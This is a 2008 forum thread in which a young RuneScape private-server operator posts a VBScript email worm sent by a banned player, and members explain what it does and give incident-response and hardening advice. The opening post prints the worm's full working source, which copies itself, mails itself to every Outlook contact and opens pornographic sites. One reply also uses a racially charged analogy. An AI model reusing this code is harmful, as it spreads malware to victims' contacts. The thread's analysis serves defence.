Warren-Plus Posted April 15, 2008 Posted April 15, 2008 Hi all. Recently i have been making an online game and on Sunday i banned a player on there but when he found out who had reported him to me he sent them a script or something. I worked out part of it changed their homepage to a porn site but i dunno if there is anything else in there. I have split it up incase there is something. On Error Resume Next Set WS = CreateObject("WScript.Shell") Set FSO= Createobject("scripting.filesystemobject") Folder=FSO.GetSpecialFolder(2) Set InF=FSO.OpenTextFile(WScript.ScriptFullname,1) Do While InF.AtEndOfStream<>True ScriptBuffer=ScriptBuffer&InF.ReadLine&vbcrlf Loop Set OutF=FSO.OpenTextFile(Folder&"\homepage.HTML.vbs",2,true) OutF.write ScriptBuffer OutF.close Set FSO=Nothing If WS.regread ("HKCU\software\An\mailed") <> "1" then Mailit() End If Set s=CreateObject("Outlook.Application") Set t=s.GetNameSpace("MAPI") Set u=t.GetDefaultFolder(6) For i=1 to u.items.count If u.Items.Item(i).subject="Homepage" Then u.Items.Item(i).close u.Items.Item(i).delete End If Next Set u=t.GetDefaultFolder(3) For i=1 to u.items.count If u.Items.Item(i).subject="Homepage" Then u.Items.Item(i).delete End If Next Randomize r=Int((4*Rnd)+1) If r=1 then WS.Run("http://********.*************.net/*******/1.htm") elseif r=2 Then WS.Run("http://*******.****.com/_XMCM/*******/1.htm") elseif r=3 Then WS.Run("http://www2.*********.com/*******/******/1.htm") ElseIf r=4 Then WS.Run("http://******.******.tv/1.htm") End If Function Mailit() On Error Resume Next Set Outlook = CreateObject("Outlook.Application") If Outlook = "Outlook" Then Set Mapi=Outlook.GetNameSpace("MAPI") Set Lists=Mapi.AddressLists For Each ListIndex In Lists If ListIndex.AddressEntries.Count <> 0 Then ContactCount = ListIndex.AddressEntries.Count For Count= 1 To ContactCount Set Mail = Outlook.CreateItem(0) Set Contact = ListIndex.AddressEntries(Count) Mail.To = Contact.Address Mail.Subject = "Homepage" Mail.Body = vbcrlf&"Hi!"&vbcrlf&vbcrlf&"You've got to see this page! It's really cool ;O)"&vbcrlf&vbcrlf Set Attachment=Mail.Attachments Attachment.Add Folder & "\homepage.HTML.vbs" Mail.DeleteAfterSubmit = True If Mail.To <> "" Then Mail.Send WS.regwrite "HKCU\software\An\mailed", "1" End If Next End If Next End if End Function Can anyone tell me if this does anything else or if i should do something about it ? Brendan PS. I didnt know if this was the right section. been a while since I been on here.
contink Posted April 15, 2008 Posted April 15, 2008 Well if you have Outlook installed on that machine your entire address book will have gotten an email that tells them to go check out a porn site if I'm reading that correctly. It should only do it once I think but all in all I'd guess the person who received it needs to learn not to run attachments and a bit more about security! As to the rest it deletes your existing homepage(s) and replaces it/them with a random porn site... Oh and I believe it writes a copy of itself into a folder somewhere too.. No idea if it would work (not about to try it!) but yeah, not the nicest nugget to send. 1
SYNACK Posted April 15, 2008 Posted April 15, 2008 (edited) Yeap, as contink says it creates a copy of itself in the temp folder and emails itself as an attachment to everyone in the outlook address book for fun. It then writes a flag for each email sent to the registry to notify it in case it is run again so that it does not bother with the emails the the same users a second time. The person that sent it may not have had a choice in the matter, their machine could very well have been hijacked. Edited April 15, 2008 by SYNACK 1
notalot Posted April 15, 2008 Posted April 15, 2008 i could be way off the mark here but it looks like it uses outlook to send a vbs that changes the homepage (to 1 of 4 pages) to every one in your address book. please correct me if im wrong. started wreading before the other posts exsisted 1
ICT_GUY Posted April 15, 2008 Posted April 15, 2008 Nod picked it up as a threat as soon as I loaded the page up. odd that. 1
Warren-Plus Posted April 15, 2008 Author Posted April 15, 2008 Thnx guys. Should i do anything about this ? Brendan
SYNACK Posted April 15, 2008 Posted April 15, 2008 Nod picked it up as a threat as soon as I loaded the page up. odd that. Built in code filtering probably, I'm pretty sure it will do the same for jscript etc. Its a nice feature just so long as it is not tied up to a Symantec solution. When one of those gets a little confused it just breaks all web pages with scripts on them.
SYNACK Posted April 15, 2008 Posted April 15, 2008 (edited) Thnx guys. Should i do anything about this ? Brendan Tell the guy to stop opening random attachments and hook himself up with a virus checker. It does not look to cause any lasting damage apart from leaving rubbish in the registry under this key HKCU\software\An\mailed. Just set the home page back and prescribe a dose of common sense for the victim. I would also run a spyware scan on the system as the pages that it directs you to could have hit the system with something else. I have looked through the code and can't see anything that would actually set the homepage to something different. I suspect that this was done by the page that it redirected you to rather than the script. Edited April 15, 2008 by SYNACK 1
Edu-IT Posted April 15, 2008 Posted April 15, 2008 He may want to contact the people in his address book too to explain.
Warren-Plus Posted April 16, 2008 Author Posted April 16, 2008 Rite this just got serious. He has now gained access to my PC (dont know how) and attacked my server and also my staff. I have him IP logged on my forums and i have another IP he uses for his server. What can i do ? Brendan
GrumbleDook Posted April 16, 2008 Posted April 16, 2008 Go to your ISP, get them to get the police involved (or do so yourself). Whilst this may be seen to be a minor thing it is still a breach of the law. 1
FN-GM Posted April 16, 2008 Posted April 16, 2008 Go to your ISP, get them to get the police involved (or do so yourself). Whilst this may be seen to be a minor thing it is still a breach of the law. I agree with you there. What has be managed to do?
contink Posted April 16, 2008 Posted April 16, 2008 I'd be looking to increase the network protection on your systems... - A hardware firewall would be a very good start - Check antivirus and malware protection - Review policies regarding systems use and go through the common sense stuff about not opening attachments, etc... If they're into your machines though I think the primary thing I'd be doing is pulling my net connection out of the wall to stop any further invasions before addressing the above through a secured system from elsewhere. Best of luck...
Warren-Plus Posted April 17, 2008 Author Posted April 17, 2008 I agree with you there. What has be managed to do? Well he has gathered personal information about players on my game that are stored on my PC. Since posting this he came on last nite and was doing something last night. I still have no idea about how he got into the files or if he has done anything else to my java files. ill find out later on today when get home from school and recompile my server. Also does anyone here kno any cheap game hosting services. The cheapest ive found is £15 a month Brendan
contink Posted April 17, 2008 Posted April 17, 2008 Can I assume from your comments that you're hosting a game server on a machine at home via your ADSL or cable connection? Can I also assume that you haven't protected this machine using a firewall or locked down the ports to the absolute minimum? If the question so far is "no", your really need to spend a bit of time learning about hardening your server and look to invest in a firewall... smoothwall will do an excellent job if you can find an old box from somewhere to host it on. As to game servers, can't help much.... But your primary concern at this point is to notify ALL your game users that their details have been compromised and to start changing passwords on ALL their forum, online banking, etc... accounts. You can bet most of them will be using the same username/ID and password in a plethora of places so if their password (even the hash) is compromised it's only a matter of time before things like ebay, paypal, etc... start getting hacked.. They will also need to check their AV and malware security, firewalls, etc... because you can bet your script kiddie hacker/cracker is going to be having fun with trying to crack their home PC's, email addresses and all the rest. In truth your game is currently the last of your problems... Some serious warnings to your users and a lot of reading up on security, etc... is a priority now.
Geoff Posted April 17, 2008 Posted April 17, 2008 You also need to wipe and reinstall your machine(s) from your last know good backup. As your entire system is compromised, you can no longer trust it.
TornUp Posted April 17, 2008 Posted April 17, 2008 you also need to look into securing sensitive data on removable storage! that is then secured itself.
powdarrmonkey Posted April 17, 2008 Posted April 17, 2008 And into the details of the Data Protection Act. Depending on your setup and activities you may find that you are also liable for not looking after the data entrusted to you adequately.
greenfieldsupport Posted April 17, 2008 Posted April 17, 2008 I second views of people who have already posted. The game is of your least priority. Archive any logs you may have, as well as his ip's and a backup of your forum / game. Take the machine down. Remove it from the internet and restore it from a backup. I imagine your problem may have been that you use the machine that all of this is hosted from ( as a user ) Ideally you should use a separate machine, or at least a user with rubbish privileges. Your machine SHOULD NOT be in a DMZ. your NAT firewall will offer you some protection but you should only forward ports necessary for the services you require. You do have an obligation to your users to explain that your website / server has been compromised. you will have to reset their passwords and give them the new ones, and you will have to warn them they should really cycle all the passwords they have associated. Mr script kiddy just needs to try stuffing some of the e-mail addys / password details into paypal, and then bad things could happen. What game is it that you host? I may be able to give you some pointers... but back to the basics. Contact your isp / the authoritys Inform your users of the problems, Take the machine down, Restore from a known good backup, Cycle all important passwords (anything without pleb access) Implement a hardware firewall or even a software based one if you have to but ensure your machine is not in a demiliterized zone. Change ports of services you dont need the public to access. even just adding numbers to the front so FTP : 21 > 57021 SMTP : 25 > 57025 POP3 : 110 > 57110 Hope this helps abit...
Warren-Plus Posted April 17, 2008 Author Posted April 17, 2008 Can I assume from your comments that you're hosting a game server on a machine at home via your ADSL or cable connection? Can I also assume that you haven't protected this machine using a firewall or locked down the ports to the absolute minimum? If the question so far is "no", your really need to spend a bit of time learning about hardening your server and look to invest in a firewall... smoothwall will do an excellent job if you can find an old box from somewhere to host it on. As to game servers, can't help much.... But your primary concern at this point is to notify ALL your game users that their details have been compromised and to start changing passwords on ALL their forum, online banking, etc... accounts. You can bet most of them will be using the same username/ID and password in a plethora of places so if their password (even the hash) is compromised it's only a matter of time before things like ebay, paypal, etc... start getting hacked.. They will also need to check their AV and malware security, firewalls, etc... because you can bet your script kiddie hacker/cracker is going to be having fun with trying to crack their home PC's, email addresses and all the rest. In truth your game is currently the last of your problems... Some serious warnings to your users and a lot of reading up on security, etc... is a priority now. Yea im running it from home as i cant afford hosting yet. Ive got Widows Firewall and ive only got the ports i need open on the router. Ive got AVG aswell. Ill contact all my members now. Brendan
powdarrmonkey Posted April 17, 2008 Posted April 17, 2008 This wouldn't be your Runescape server would it? Windows Firewall and AVG really aren't going to cut it. Not if you insist on opening laden attachments anyway.
Warren-Plus Posted April 17, 2008 Author Posted April 17, 2008 Yea it is my runescape server. And i havent opened any attachments. Brendan
contink Posted April 17, 2008 Posted April 17, 2008 Yea it is my runescape server. And i havent opened any attachments. I'm afraid whether you have or you haven't windows firewall and AVG as your only security measures had my mouth hanging open in dismay. I could butter it up some for you but really I think you've just learned a very harsh lesson in reality. That the system is your main machine means you've left yourself even further at risk. If you've every done anything even remotely ecommerce related (ie: bought off of Amazon, paypal, etc...) I would strongly advise you to consider calling your bank and any card providers and ask them to re-issue cards... Assume basically they your entire life is compromised and start over. You really can't be too careful. Then take a long hard look at firewalls (not just software ones, look at hardware too) as a starting point to securing your network connection. As Geoff said, wipe your machine and start over, completely. I'd also look at a completely seperate box for hosting your game server if you decide to return to that... I think to provide an analogy... You've done the equivalent of walking into Harlem with a biiiiiig bag and a 15 foot sign on it saying "I have a million dollars in my bag, I hate black people and I'm carrying a fake rubber knife for protection... Rob me!". That probably doesn't even go far enough to be honest... But hey, you're still alive and it's an analogy so you can always learn from it
Recommended Posts
Create an account or sign in to comment
You need to be a member in order to leave a comment
Create an account
Sign up for a new account in our community. It's easy!
Register a new accountSign in
Already have an account? Sign in here.
Sign In Now